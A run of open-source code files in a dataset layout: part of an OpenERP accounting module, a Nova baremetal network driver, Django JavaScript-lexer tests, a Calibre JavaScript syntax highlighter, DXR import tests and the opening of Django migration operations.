res[1] != 'draft': raise osv.except_osv(_('User Error!'), _('The account move (%s) for centralisation ' \ 'has been confirmed.') % res[2]) return res def _remove_move_reconcile(self, cr, uid, move_ids=None, opening_reconciliation=False, context=None): # Function remove move rencocile ids related with moves obj_move_line = self.pool.get('account.move.line') obj_move_rec = self.pool.get('account.move.reconcile') unlink_ids = [] if not move_ids: return True recs = obj_move_line.read(cr, uid, move_ids, ['reconcile_id', 'reconcile_partial_id']) full_recs = filter(lambda x: x['reconcile_id'], recs) rec_ids = [rec['reconcile_id'][0] for rec in full_recs] part_recs = filter(lambda x: x['reconcile_partial_id'], recs) part_rec_ids = [rec['reconcile_partial_id'][0] for rec in part_recs] unlink_ids += rec_ids unlink_ids += part_rec_ids all_moves = obj_move_line.search(cr, uid, ['|',('reconcile_id', 'in', unlink_ids),('reconcile_partial_id', 'in', unlink_ids)]) all_moves = list(set(all_moves) - set(move_ids)) if unlink_ids: if opening_reconciliation: raise osv.except_osv(_('Warning!'), _('Opening Entries have already been generated. Please run "Cancel Closing Entries" wizard to cancel those entries and then run this wizard.')) obj_move_rec.write(cr, uid, unlink_ids, {'opening_reconciliation': False}) obj_move_rec.unlink(cr, uid, unlink_ids) if len(all_moves) >= 2: obj_move_line.reconcile_partial(cr, uid, all_moves, 'auto',context=context) return True def unlink(self, cr, uid, ids, context=None, check=True): if context is None: context = {} move_obj = self.pool.get('account.move') self._update_check(cr, uid, ids, context) result = False move_ids = set() for line in self.browse(cr, uid, ids, context=context): move_ids.add(line.move_id.id) context['journal_id'] = line.journal_id.id context['period_id'] = line.period_id.id result = super(account_move_line, self).unlink(cr, uid, [line.id], context=context) move_ids = list(move_ids) if check and move_ids: move_obj.validate(cr, uid, move_ids, context=context) return result def write(self, cr, uid, ids, vals, context=None, check=True, update_check=True): if context is None: context={} move_obj = self.pool.get('account.move') account_obj = self.pool.get('account.account') journal_obj = self.pool.get('account.journal') if isinstance(ids, (int, long)): ids = [ids] if vals.get('account_tax_id', False): raise osv.except_osv(_('Unable to change tax!'), _('You cannot change the tax, you should remove and recreate lines.')) if ('account_id' in vals) and not account_obj.read(cr, uid, vals['account_id'], ['active'])['active']: raise osv.except_osv(_('Bad Account!'), _('You cannot use an inactive account.')) if update_check: if ('account_id' in vals) or ('journal_id' in vals) or ('period_id' in vals) or ('move_id' in vals) or ('debit' in vals) or ('credit' in vals) or ('date' in vals): self._update_check(cr, uid, ids, context) todo_date = None if vals.get('date', False): todo_date = vals['date'] del vals['date'] for line in self.browse(cr, uid, ids, context=context): ctx = context.copy() if not ctx.get('journal_id'): if line.move_id: ctx['journal_id'] = line.move_id.journal_id.id else: ctx['journal_id'] = line.journal_id.id if not ctx.get('period_id'): if line.move_id: ctx['period_id'] = line.move_id.period_id.id else: ctx['period_id'] = line.period_id.id #Check for centralisation journal = journal_obj.browse(cr, uid, ctx['journal_id'], context=ctx) if journal.centralisation: self._check_moves(cr, uid, context=ctx) result = super(account_move_line, self).write(cr, uid, ids, vals, context) if check: done = [] for line in self.browse(cr, uid, ids): if line.move_id.id not in done: done.append(line.move_id.id) move_obj.validate(cr, uid, [line.move_id.id], context) if todo_date: move_obj.write(cr, uid, [line.move_id.id], {'date': todo_date}, context=context) return result def _update_journal_check(self, cr, uid, journal_id, period_id, context=None): journal_obj = self.pool.get('account.journal') period_obj = self.pool.get('account.period') jour_period_obj = self.pool.get('account.journal.period') cr.execute('SELECT state FROM account_journal_period WHERE journal_id = %s AND period_id = %s', (journal_id, period_id)) result = cr.fetchall() journal = journal_obj.browse(cr, uid, journal_id, context=context) period = period_obj.browse(cr, uid, period_id, context=context) for (state,) in result: if state == 'done': raise osv.except_osv(_('Error!'), _('You can not add/modify entries in a closed period %s of journal %s.' % (period.name,journal.name))) if not result: jour_period_obj.create(cr, uid, { 'name': (journal.code or journal.name)+':'+(period.name or ''), 'journal_id': journal.id, 'period_id': period.id }) return True def _update_check(self, cr, uid, ids, context=None): done = {} for line in self.browse(cr, uid, ids, context=context): err_msg = _('Move name (id): %s (%s)') % (line.move_id.name, str(line.move_id.id)) if line.move_id.state <> 'draft' and (not line.journal_id.entry_posted): raise osv.except_osv(_('Error!'), _('You cannot do this modification on a confirmed entry. You can just change some non legal fields or you must unconfirm the journal entry first.\n%s.') % err_msg) if line.reconcile_id: raise osv.except_osv(_('Error!'), _('You cannot do this modification on a reconciled entry. You can just change some non legal fields or you must unreconcile first.\n%s.') % err_msg) t = (line.journal_id.id, line.period_id.id) if t not in done: self._update_journal_check(cr, uid, line.journal_id.id, line.period_id.id, context) done[t] = True return True def create(self, cr, uid, vals, context=None, check=True): account_obj = self.pool.get('account.account') tax_obj = self.pool.get('account.tax') move_obj = self.pool.get('account.move') cur_obj = self.pool.get('res.currency') journal_obj = self.pool.get('account.journal') context = dict(context or {}) if vals.get('move_id', False): move = self.pool.get('account.move').browse(cr, uid, vals['move_id'], context=context) if move.company_id: vals['company_id'] = move.company_id.id if move.date and not vals.get('date'): vals['date'] = move.date if ('account_id' in vals) and not account_obj.read(cr, uid, [vals['account_id']], ['active'])[0]['active']: raise osv.except_osv(_('Bad Account!'), _('You cannot use an inactive account.')) if 'journal_id' in vals and vals['journal_id']: context['journal_id'] = vals['journal_id'] if 'period_id' in vals and vals['period_id']: context['period_id'] = vals['period_id'] if ('journal_id' not in context) and ('move_id' in vals) and vals['move_id']: m = move_obj.browse(cr, uid, vals['move_id']) context['journal_id'] = m.journal_id.id context['period_id'] = m.period_id.id #we need to treat the case where a value is given in the context for period_id as a string if 'period_id' in context and not isinstance(context.get('period_id', ''), (int, long)): period_candidate_ids = self.pool.get('account.period').name_search(cr, uid, name=context.get('period_id','')) if len(period_candidate_ids) != 1: raise osv.except_osv(_('Error!'), _('No period found or more than one period found for the given date.')) context['period_id'] = period_candidate_ids[0][0] if not context.get('journal_id', False) and context.get('search_default_journal_id', False): context['journal_id'] = context.get('search_default_journal_id') self._update_journal_check(cr, uid, context['journal_id'], context['period_id'], context) move_id = vals.get('move_id', False) journal = journal_obj.browse(cr, uid, context['journal_id'], context=context) vals['journal_id'] = vals.get('journal_id') or context.get('journal_id') vals['period_id'] = vals.get('period_id') or context.get('period_id') vals['date'] = vals.get('date') or context.get('date') if not move_id: if journal.centralisation: #Check for centralisation res = self._check_moves(cr, uid, context) if res: vals['move_id'] = res[0] if not vals.get('move_id', False): if journal.sequence_id: #name = self.pool.get('ir.sequence').next_by_id(cr, uid, journal.sequence_id.id) v = { 'date': vals.get('date', time.strftime('%Y-%m-%d')), 'period_id': context['period_id'], 'journal_id': context['journal_id'] } if vals.get('ref', ''): v.update({'ref': vals['ref']}) move_id = move_obj.create(cr, uid, v, context) vals['move_id'] = move_id else: raise osv.except_osv(_('No Piece Number!'), _('Cannot create an automatic sequence for this piece.\nPut a sequence in the journal definition for automatic numbering or create a sequence manually for this piece.')) ok = not (journal.type_control_ids or journal.account_control_ids) if ('account_id' in vals): account = account_obj.browse(cr, uid, vals['account_id'], context=context) if journal.type_control_ids: type = account.user_type for t in journal.type_control_ids: if type.code == t.code: ok = True break if journal.account_control_ids and not ok: for a in journal.account_control_ids: if a.id == vals['account_id']: ok = True break # Automatically convert in the account's secondary currency if there is one and # the provided values were not already multi-currency if account.currency_id and 'amount_currency' not in vals and account.currency_id.id != account.company_id.currency_id.id: vals['currency_id'] = account.currency_id.id ctx = {} if 'date' in vals: ctx['date'] = vals['date'] vals['amount_currency'] = cur_obj.compute(cr, uid, account.company_id.currency_id.id, account.currency_id.id, vals.get('debit', 0.0)-vals.get('credit', 0.0), context=ctx) if not ok: raise osv.except_osv(_('Bad Account!'), _('You cannot use this general account in this journal, check the tab \'Entry Controls\' on the related journal.')) result = super(account_move_line, self).create(cr, uid, vals, context=context) # CREATE Taxes if vals.get('account_tax_id', False): tax_id = tax_obj.browse(cr, uid, vals['account_tax_id']) total = vals['debit'] - vals['credit'] base_code = 'base_code_id' tax_code = 'tax_code_id' account_id = 'account_collected_id' base_sign = 'base_sign' tax_sign = 'tax_sign' if journal.type in ('purchase_refund', 'sale_refund') or (journal.type in ('cash', 'bank') and total < 0): base_code = 'ref_base_code_id' tax_code = 'ref_tax_code_id' account_id = 'account_paid_id' base_sign = 'ref_base_sign' tax_sign = 'ref_tax_sign' tmp_cnt = 0 for tax in tax_obj.compute_all(cr, uid, [tax_id], total, 1.00, force_excluded=False).get('taxes'): #create the base movement if tmp_cnt == 0: if tax[base_code]: tmp_cnt += 1 if tax_id.price_include: total = tax['price_unit'] newvals = { 'tax_code_id': tax[base_code], 'tax_amount': tax[base_sign] * abs(total), } if tax_id.price_include: if tax['price_unit'] < 0: newvals['credit'] = abs(tax['price_unit']) else: newvals['debit'] = tax['price_unit'] self.write(cr, uid, [result], newvals, context=context) else: data = { 'move_id': vals['move_id'], 'name': tools.ustr(vals['name'] or '') + ' ' + tools.ustr(tax['name'] or ''), 'date': vals['date'], 'partner_id': vals.get('partner_id', False), 'ref': vals.get('ref', False), 'statement_id': vals.get('statement_id', False), 'account_tax_id': False, 'tax_code_id': tax[base_code], 'tax_amount': tax[base_sign] * abs(total), 'account_id': vals['account_id'], 'credit': 0.0, 'debit': 0.0, } if data['tax_code_id']: self.create(cr, uid, data, context) #create the Tax movement data = { 'move_id': vals['move_id'], 'name': tools.ustr(vals['name'] or '') + ' ' + tools.ustr(tax['name'] or ''), 'date': vals['date'], 'partner_id': vals.get('partner_id',False), 'ref': vals.get('ref',False), 'statement_id': vals.get('statement_id', False), 'account_tax_id': False, 'tax_code_id': tax[tax_code], 'tax_amount': tax[tax_sign] * abs(tax['amount']), 'account_id': tax[account_id] or vals['account_id'], 'credit': tax['amount']<0 and -tax['amount'] or 0.0, 'debit': tax['amount']>0 and tax['amount'] or 0.0, } if data['tax_code_id']: self.create(cr, uid, data, context) del vals['account_tax_id'] if check and not context.get('novalidate') and (context.get('recompute', True) or journal.entry_posted): tmp = move_obj.validate(cr, uid, [vals['move_id']], context) if journal.entry_posted and tmp: move_obj.button_validate(cr,uid, [vals['move_id']], context) return result def list_periods(self, cr, uid, context=None): ids = self.pool.get('account.period').search(cr,uid,[]) return self.pool.get('account.period').name_get(cr, uid, ids, context=context) def list_journals(self, cr, uid, context=None): ng = dict(self.pool.get('account.journal').name_search(cr,uid,'',[])) ids = ng.keys() result = [] for journal in self.pool.get('account.journal').browse(cr, uid, ids, context=context): result.append((journal.id,ng[journal.id],journal.type, bool(journal.currency),bool(journal.analytic_journal_id))) return result # vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
agpl-3.0
fajoy/nova
nova/virt/baremetal/vif_driver.py
2
3058
# Copyright (c) 2012 NTT DOCOMO, INC. # All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. from nova import context from nova import exception from nova.openstack.common import cfg from nova.openstack.common import log as logging from nova.virt.baremetal import db as bmdb CONF = cfg.CONF LOG = logging.getLogger(__name__) class BareMetalVIFDriver(object): def _after_plug(self, instance, network, mapping, pif): pass def _after_unplug(self, instance, network, mapping, pif): pass def plug(self, instance, vif): LOG.debug(_("plug: instance_uuid=%(uuid)s vif=%(vif)s") % {'uuid': instance['uuid'], 'vif': vif}) network, mapping = vif vif_uuid = mapping['vif_uuid'] ctx = context.get_admin_context() node = bmdb.bm_node_get_by_instance_uuid(ctx, instance['uuid']) # TODO(deva): optimize this database query # this is just searching for a free physical interface pifs = bmdb.bm_interface_get_all_by_bm_node_id(ctx, node['id']) for pif in pifs: if not pif['vif_uuid']: bmdb.bm_interface_set_vif_uuid(ctx, pif['id'], vif_uuid) LOG.debug(_("pif:%(id)s is plugged (vif_uuid=%(vif_uuid)s)") % {'id': pif['id'], 'vif_uuid': vif_uuid}) self._after_plug(instance, network, mapping, pif) return # NOTE(deva): should this really be raising an exception # when there are no physical interfaces left? raise exception.NovaException(_( "Baremetal node: %(id)s has no available physical interface" " for virtual interface %(vif_uuid)s") % {'id': node['id'], 'vif_uuid': vif_uuid}) def unplug(self, instance, vif): LOG.debug(_("unplug: instance_uuid=%(uuid)s vif=%(vif)s"), {'uuid': instance['uuid'], 'vif': vif}) network, mapping = vif vif_uuid = mapping['vif_uuid'] ctx = context.get_admin_context() try: pif = bmdb.bm_interface_get_by_vif_uuid(ctx, vif_uuid) bmdb.bm_interface_set_vif_uuid(ctx, pif['id'], None) LOG.debug(_("pif:%(id)s is unplugged (vif_uuid=%(vif_uuid)s)") % {'id': pif['id'], 'vif_uuid': vif_uuid}) self._after_unplug(instance, network, mapping, pif) except exception.NovaException: LOG.warn(_("no pif for vif_uuid=%s") % vif_uuid)
apache-2.0
Batterfii/django
tests/utils_tests/test_jslex.py
153
9837
# -*- coding: utf-8 -*- """Tests for jslex.""" # originally from https://bitbucket.org/ned/jslex from __future__ import unicode_literals from django.test import SimpleTestCase from django.utils.jslex import JsLexer, prepare_js_for_gettext class JsTokensTest(SimpleTestCase): LEX_CASES = [ # ids ("a ABC $ _ a123", ["id a", "id ABC", "id $", "id _", "id a123"]), ("\\u1234 abc\\u0020 \\u0065_\\u0067", ["id \\u1234", "id abc\\u0020", "id \\u0065_\\u0067"]), # numbers ("123 1.234 0.123e-3 0 1E+40 1e1 .123", [ "dnum 123", "dnum 1.234", "dnum 0.123e-3", "dnum 0", "dnum 1E+40", "dnum 1e1", "dnum .123", ]), ("0x1 0xabCD 0XABcd", ["hnum 0x1", "hnum 0xabCD", "hnum 0XABcd"]), ("010 0377 090", ["onum 010", "onum 0377", "dnum 0", "dnum 90"]), ("0xa123ghi", ["hnum 0xa123", "id ghi"]), # keywords ("function Function FUNCTION", ["keyword function", "id Function", "id FUNCTION"]), ("const constructor in inherits", ["keyword const", "id constructor", "keyword in", "id inherits"]), ("true true_enough", ["reserved true", "id true_enough"]), # strings (''' 'hello' "hello" ''', ["string 'hello'", 'string "hello"']), (r""" 'don\'t' "don\"t" '"' "'" '\'' "\"" """, [ r"""string 'don\'t'""", r'''string "don\"t"''', r"""string '"'""", r'''string "'"''', r"""string '\''""", r'''string "\""''' ]), (r'"ƃuıxǝ⅂ ʇdıɹɔsɐʌɐſ\""', [r'string "ƃuıxǝ⅂ ʇdıɹɔsɐʌɐſ\""']), # comments ("a//b", ["id a", "linecomment //b"]), ("/****/a/=2//hello", ["comment /****/", "id a", "punct /=", "dnum 2", "linecomment //hello"]), ("/*\n * Header\n */\na=1;", ["comment /*\n * Header\n */", "id a", "punct =", "dnum 1", "punct ;"]), # punctuation ("a+++b", ["id a", "punct ++", "punct +", "id b"]), # regex (r"a=/a*/,1", ["id a", "punct =", "regex /a*/", "punct ,", "dnum 1"]), (r"a=/a*[^/]+/,1", ["id a", "punct =", "regex /a*[^/]+/", "punct ,", "dnum 1"]), (r"a=/a*\[^/,1", ["id a", "punct =", r"regex /a*\[^/", "punct ,", "dnum 1"]), (r"a=/\//,1", ["id a", "punct =", r"regex /\//", "punct ,", "dnum 1"]), # next two are from http://www.mozilla.org/js/language/js20-2002-04/rationale/syntax.html#regular-expressions ("""for (var x = a in foo && "</x>" || mot ? z:/x:3;x<5;y</g/i) {xyz(x++);}""", ["keyword for", "punct (", "keyword var", "id x", "punct =", "id a", "keyword in", "id foo", "punct &&", 'string "</x>"', "punct ||", "id mot", "punct ?", "id z", "punct :", "regex /x:3;x<5;y</g", "punct /", "id i", "punct )", "punct {", "id xyz", "punct (", "id x", "punct ++", "punct )", "punct ;", "punct }"]), ("""for (var x = a in foo && "</x>" || mot ? z/x:3;x<5;y</g/i) {xyz(x++);}""", ["keyword for", "punct (", "keyword var", "id x", "punct =", "id a", "keyword in", "id foo", "punct &&", 'string "</x>"', "punct ||", "id mot", "punct ?", "id z", "punct /", "id x", "punct :", "dnum 3", "punct ;", "id x", "punct <", "dnum 5", "punct ;", "id y", "punct <", "regex /g/i", "punct )", "punct {", "id xyz", "punct (", "id x", "punct ++", "punct )", "punct ;", "punct }"]), # Various "illegal" regexes that are valid according to the std. (r"""/????/, /++++/, /[----]/ """, ["regex /????/", "punct ,", "regex /++++/", "punct ,", "regex /[----]/"]), # Stress cases from http://stackoverflow.com/questions/5533925/what-javascript-constructs-does-jslex-incorrectly-lex/5573409#5573409 # NOQA (r"""/\[/""", [r"""regex /\[/"""]), (r"""/[i]/""", [r"""regex /[i]/"""]), (r"""/[\]]/""", [r"""regex /[\]]/"""]), (r"""/a[\]]/""", [r"""regex /a[\]]/"""]), (r"""/a[\]]b/""", [r"""regex /a[\]]b/"""]), (r"""/[\]/]/gi""", [r"""regex /[\]/]/gi"""]), (r"""/\[[^\]]+\]/gi""", [r"""regex /\[[^\]]+\]/gi"""]), (""" rexl.re = { NAME: /^(?![0-9])(?:\w)+|^"(?:[^"]|"")+"/, UNQUOTED_LITERAL: /^@(?:(?![0-9])(?:\w|\:)+|^"(?:[^"]|"")+")\[[^\]]+\]/, QUOTED_LITERAL: /^'(?:[^']|'')*'/, NUMERIC_LITERAL: /^[0-9]+(?:\.[0-9]*(?:[eE][-+][0-9]+)?)?/, SYMBOL: /^(?:==|=|<>|<=|<|>=|>|!~~|!~|~~|~|!==|!=|!~=|!~|!|&|\||\.|\:|,|\(|\)|\[|\]|\{|\}|\?|\:|;|@|\^|\/\+|\/|\*|\+|-)/ }; """, # NOQA ["id rexl", "punct .", "id re", "punct =", "punct {", "id NAME", "punct :", r"""regex /^(?![0-9])(?:\w)+|^"(?:[^"]|"")+"/""", "punct ,", "id UNQUOTED_LITERAL", "punct :", r"""regex /^@(?:(?![0-9])(?:\w|\:)+|^"(?:[^"]|"")+")\[[^\]]+\]/""", "punct ,", "id QUOTED_LITERAL", "punct :", r"""regex /^'(?:[^']|'')*'/""", "punct ,", "id NUMERIC_LITERAL", "punct :", r"""regex /^[0-9]+(?:\.[0-9]*(?:[eE][-+][0-9]+)?)?/""", "punct ,", "id SYMBOL", "punct :", r"""regex /^(?:==|=|<>|<=|<|>=|>|!~~|!~|~~|~|!==|!=|!~=|!~|!|&|\||\.|\:|,|\(|\)|\[|\]|\{|\}|\?|\:|;|@|\^|\/\+|\/|\*|\+|-)/""", # NOQA "punct }", "punct ;" ]), (""" rexl.re = { NAME: /^(?![0-9])(?:\w)+|^"(?:[^"]|"")+"/, UNQUOTED_LITERAL: /^@(?:(?![0-9])(?:\w|\:)+|^"(?:[^"]|"")+")\[[^\]]+\]/, QUOTED_LITERAL: /^'(?:[^']|'')*'/, NUMERIC_LITERAL: /^[0-9]+(?:\.[0-9]*(?:[eE][-+][0-9]+)?)?/, SYMBOL: /^(?:==|=|<>|<=|<|>=|>|!~~|!~|~~|~|!==|!=|!~=|!~|!|&|\||\.|\:|,|\(|\)|\[|\]|\{|\}|\?|\:|;|@|\^|\/\+|\/|\*|\+|-)/ }; str = '"'; """, # NOQA ["id rexl", "punct .", "id re", "punct =", "punct {", "id NAME", "punct :", r"""regex /^(?![0-9])(?:\w)+|^"(?:[^"]|"")+"/""", "punct ,", "id UNQUOTED_LITERAL", "punct :", r"""regex /^@(?:(?![0-9])(?:\w|\:)+|^"(?:[^"]|"")+")\[[^\]]+\]/""", "punct ,", "id QUOTED_LITERAL", "punct :", r"""regex /^'(?:[^']|'')*'/""", "punct ,", "id NUMERIC_LITERAL", "punct :", r"""regex /^[0-9]+(?:\.[0-9]*(?:[eE][-+][0-9]+)?)?/""", "punct ,", "id SYMBOL", "punct :", r"""regex /^(?:==|=|<>|<=|<|>=|>|!~~|!~|~~|~|!==|!=|!~=|!~|!|&|\||\.|\:|,|\(|\)|\[|\]|\{|\}|\?|\:|;|@|\^|\/\+|\/|\*|\+|-)/""", # NOQA "punct }", "punct ;", "id str", "punct =", """string '"'""", "punct ;", ]), (r""" this._js = "e.str(\"" + this.value.replace(/\\/g, "\\\\").replace(/"/g, "\\\"") + "\")"; """, ["keyword this", "punct .", "id _js", "punct =", r'''string "e.str(\""''', "punct +", "keyword this", "punct .", "id value", "punct .", "id replace", "punct (", r"regex /\\/g", "punct ,", r'string "\\\\"', "punct )", "punct .", "id replace", "punct (", r'regex /"/g', "punct ,", r'string "\\\""', "punct )", "punct +", r'string "\")"', "punct ;"]), ] def make_function(input, toks): def test_func(self): lexer = JsLexer() result = ["%s %s" % (name, tok) for name, tok in lexer.lex(input) if name != 'ws'] self.assertListEqual(result, toks) return test_func for i, (input, toks) in enumerate(JsTokensTest.LEX_CASES): setattr(JsTokensTest, "test_case_%d" % i, make_function(input, toks)) GETTEXT_CASES = ( ( r""" a = 1; /* /[0-9]+/ */ b = 0x2a0b / 1; // /[0-9]+/ c = 3; """, r""" a = 1; /* /[0-9]+/ */ b = 0x2a0b / 1; // /[0-9]+/ c = 3; """ ), ( r""" a = 1.234e-5; /* * /[0-9+/ */ b = .0123; """, r""" a = 1.234e-5; /* * /[0-9+/ */ b = .0123; """ ), ( r""" x = y / z; alert(gettext("hello")); x /= 3; """, r""" x = y / z; alert(gettext("hello")); x /= 3; """ ), ( r""" s = "Hello \"th/foo/ere\""; s = 'He\x23llo \'th/foo/ere\''; s = 'slash quote \", just quote "'; """, r""" s = "Hello \"th/foo/ere\""; s = "He\x23llo \'th/foo/ere\'"; s = "slash quote \", just quote \""; """ ), ( r""" s = "Line continuation\ continued /hello/ still the string";/hello/; """, r""" s = "Line continuation\ continued /hello/ still the string";"REGEX"; """ ), ( r""" var regex = /pattern/; var regex2 = /matter/gm; var regex3 = /[*/]+/gm.foo("hey"); """, r""" var regex = "REGEX"; var regex2 = "REGEX"; var regex3 = "REGEX".foo("hey"); """ ), ( r""" for (var x = a in foo && "</x>" || mot ? z:/x:3;x<5;y</g/i) {xyz(x++);} for (var x = a in foo && "</x>" || mot ? z/x:3;x<5;y</g/i) {xyz(x++);} """, r""" for (var x = a in foo && "</x>" || mot ? z:"REGEX"/i) {xyz(x++);} for (var x = a in foo && "</x>" || mot ? z/x:3;x<5;y<"REGEX") {xyz(x++);} """ ), ( """ \\u1234xyz = gettext('Hello there'); """, r""" Uu1234xyz = gettext("Hello there"); """ ) ) class JsToCForGettextTest(SimpleTestCase): pass def make_function(js, c): def test_func(self): self.assertMultiLineEqual(prepare_js_for_gettext(js), c) return test_func for i, pair in enumerate(GETTEXT_CASES): setattr(JsToCForGettextTest, "test_case_%d" % i, make_function(*pair))
bsd-3-clause
ashang/calibre
src/calibre/gui2/tweak_book/editor/syntax/javascript.py
14
3917
#!/usr/bin/env python2 # vim:fileencoding=utf-8 from __future__ import (unicode_literals, division, absolute_import, print_function) __license__ = 'GPL v3' __copyright__ = '2014, Kovid Goyal <kovid at kovidgoyal.net>' import re from pygments.lexer import RegexLexer, default, include from pygments.token import Comment, Punctuation, Number, Keyword, Text, String, Operator, Name import pygments.unistring as uni from calibre.gui2.tweak_book.editor.syntax.pygments_highlighter import create_highlighter JS_IDENT_START = ('(?:[$_' + uni.combine('Lu', 'Ll', 'Lt', 'Lm', 'Lo', 'Nl') + ']|\\\\u[a-fA-F0-9]{4})') JS_IDENT_PART = ('(?:[$' + uni.combine('Lu', 'Ll', 'Lt', 'Lm', 'Lo', 'Nl', 'Mn', 'Mc', 'Nd', 'Pc') + u'\u200c\u200d]|\\\\u[a-fA-F0-9]{4})') JS_IDENT = JS_IDENT_START + '(?:' + JS_IDENT_PART + ')*' class JavascriptLexer(RegexLexer): """ For JavaScript source code. This is based on the pygments JS highlighter, bu that does not handle multi-line comments in streaming mode, so we had to modify it. """ flags = re.UNICODE | re.MULTILINE tokens = { b'commentsandwhitespace': [ (r'\s+', Text), (r'<!--', Comment), (r'//.*?$', Comment.Single), (r'/\*', Comment.Multiline, b'comment') ], b'comment': [ (r'[^*/]+', Comment.Multiline), (r'\*/', Comment.Multiline, b'#pop'), (r'[*/]', Comment.Multiline), ], b'slashstartsregex': [ include(b'commentsandwhitespace'), (r'/(\\.|[^[/\\\n]|\[(\\.|[^\]\\\n])*])+/' r'([gim]+\b|\B)', String.Regex, b'#pop'), (r'(?=/)', Text, (b'#pop', b'badregex')), default(b'#pop') ], b'badregex': [ (r'\n', Text, b'#pop') ], b'root': [ (r'\A#! ?/.*?\n', Comment), # shebang lines are recognized by node.js (r'^(?=\s|/|<!--)', Text, b'slashstartsregex'), include(b'commentsandwhitespace'), (r'\+\+|--|~|&&|\?|:|\|\||\\(?=\n)|' r'(<<|>>>?|==?|!=?|[-<>+*%&|^/])=?', Operator, b'slashstartsregex'), (r'[{(\[;,]', Punctuation, b'slashstartsregex'), (r'[})\].]', Punctuation), (r'(for|in|while|do|break|return|continue|switch|case|default|if|else|' r'throw|try|catch|finally|new|delete|typeof|instanceof|void|yield|' r'this)\b', Keyword, b'slashstartsregex'), (r'(var|let|with|function)\b', Keyword.Declaration, b'slashstartsregex'), (r'(abstract|boolean|byte|char|class|const|debugger|double|enum|export|' r'extends|final|float|goto|implements|import|int|interface|long|native|' r'package|private|protected|public|short|static|super|synchronized|throws|' r'transient|volatile)\b', Keyword.Reserved), (r'(true|false|null|NaN|Infinity|undefined)\b', Keyword.Constant), (r'(Array|Boolean|Date|Error|Function|Math|netscape|' r'Number|Object|Packages|RegExp|String|sun|decodeURI|' r'decodeURIComponent|encodeURI|encodeURIComponent|' r'Error|eval|isFinite|isNaN|parseFloat|parseInt|document|this|' r'window)\b', Name.Builtin), (JS_IDENT, Name.Other), (r'[0-9][0-9]*\.[0-9]+([eE][0-9]+)?[fd]?', Number.Float), (r'0x[0-9a-fA-F]+', Number.Hex), (r'[0-9]+', Number.Integer), (r'"(\\\\|\\"|[^"])*"', String.Double), (r"'(\\\\|\\'|[^'])*'", String.Single), ] } Highlighter = create_highlighter('JavascriptHighlighter', JavascriptLexer) if __name__ == '__main__': from calibre.gui2.tweak_book.editor.widget import launch_editor launch_editor(P('viewer/images.js'), syntax='javascript')
gpl-3.0
gartung/dxr
dxr/plugins/python/tests/test_imports/test_imports.py
9
2924
from dxr.testing import DxrInstanceTestCase class ImportTests(DxrInstanceTestCase): def test_bases_from_import(self): """Make sure the bases: filter matches base classes imported from another file using `from x import y`. """ self.found_line_eq('bases:child.FromImportChildClass', 'class <b>ParentClass</b>(object):', 1) def test_bases_from_import_alias(self): """Make sure the bases: filter matches base classes imported from another file using `from x import y as z`. """ self.found_line_eq('bases:child.FromImportAsChildClass', 'class <b>ParentClass</b>(object):', 1) def test_bases_import(self): """Make sure the bases: filter matches base classes imported from another file using `import x`. """ self.found_line_eq('bases:child.ImportChildClass', 'class <b>ParentClass</b>(object):', 1) def test_bases_import_as(self): """Make sure the bases: filter matches base classes imported from another file using `import x as y`. """ self.found_line_eq('bases:child.ImportAsChildClass', 'class <b>ParentClass</b>(object):', 1) def test_bases_relative_import(self): """Make sure the bases: filter matches base classes imported from another file using `from . import x`. """ self.found_line_eq('bases:child.RelativeImportChildClass', 'class <b>ParentClass</b>(object):', 1) def test_derived(self): """Make sure the derived: filter matches child classes that import from another file in a variety of ways. """ self.found_lines_eq('derived:parent.ParentClass', [ ('class <b>FromImportChildClass</b>(ParentClass):', 8), ('class <b>ImportChildClass</b>(parent.ParentClass):', 12), ('class <b>FromImportAsChildClass</b>(PClass):', 16), ('class <b>ImportAsChildClass</b>(blarent.ParentClass):', 20), ('class <b>RelativeImportChildClass</b>(carent.ParentClass):', 24), ]) # Edge cases for the code in `package`. def test_submodule_import_from(self): """Make sure we handle `from package import submodule` as well as `import package.submodule`. """ self.found_lines_eq('derived:package.submodule.MyClass', [ ('class <b>FirstDerivedFromSubmodule</b>(submodule.MyClass):', 4), ('class <b>SecondDerivedFromSubmodule</b>(package.submodule.MyClass):', 9), ]) def test_submodule_name_collision(self): """Make sure we handle `from package.sub import sub`.""" self.found_line_eq('derived:package.test_import_name_collision.MyClass', 'class <b>DerivedFromInaccessibleClass</b>(MyClass):', 24)
mit
rogerhu/django
django/db/migrations/operations/models.py
5
9571
from .base import Operation from django.utils import six from django.db import models, router from django.db.models.options import normalize_unique_together from django.db.migrations.state import ModelState class CreateModel(Operation): """ Create a model's table. """ def __init__(self, name, fields, options=None, bases=None): self.name = name self.fields = fields self.options = options or {} self.bases = bases or (models.Model,) def state_forwards(self, app_label, state): state.models[app_label, self.name.lower()] = ModelState(app_label, self.name, self.fields, self.options, self.bases) def database_forwards(self, app_label, schema_editor, from_state, to_state): app_cache = to_state.render() model = app_cache.get_model(app_label, self.name) if router.allow_migrate(schema_editor.connection.alias, model): schema_editor.create_model(model) def database_backwards(self, app_label, schema_editor, from_state, to_state): app_cache = from_state.render() model = app_cache.get_model(app_label, self.name) if router.allow_migrate(schema_editor.connection.alias, model): schema_editor.delete_model(model) def describe(self): return "Create model %s" % (self.name, ) def references_model(self, name, app_label=None): strings_to_check = [self.name] # Check we didn't inherit from the model for base in self.bases: if isinstance(base, six.string_types): strings_to_check.append(base.split(".")[-1]) # Check we have no FKs/M2Ms with it for fname, field in self.fields: if field.rel: if isinstance(field.rel.to, six.string_types): strings_to_check.append(field.rel.to.split(".")[-1]) # Now go over all the strings and compare them for string in strings_to_check: if string.lower() == name.lower(): return True return False def __eq__(self, other): return ( (self.__class__ == other.__class__) and (self.name == other.name) and (self.options == other.options) and (self.bases == other.bases) and ([(k, f.deconstruct()[1:]) for k, f in self.fields] == [(k, f.deconstruct()[1:]) for k, f in other.fields]) ) class DeleteModel(Operation): """ Drops a model's table. """ def __init__(self, name): self.name = name def state_forwards(self, app_label, state): del state.models[app_label, self.name.lower()] def database_forwards(self, app_label, schema_editor, from_state, to_state): app_cache = from_state.render() model = app_cache.get_model(app_label, self.name) if 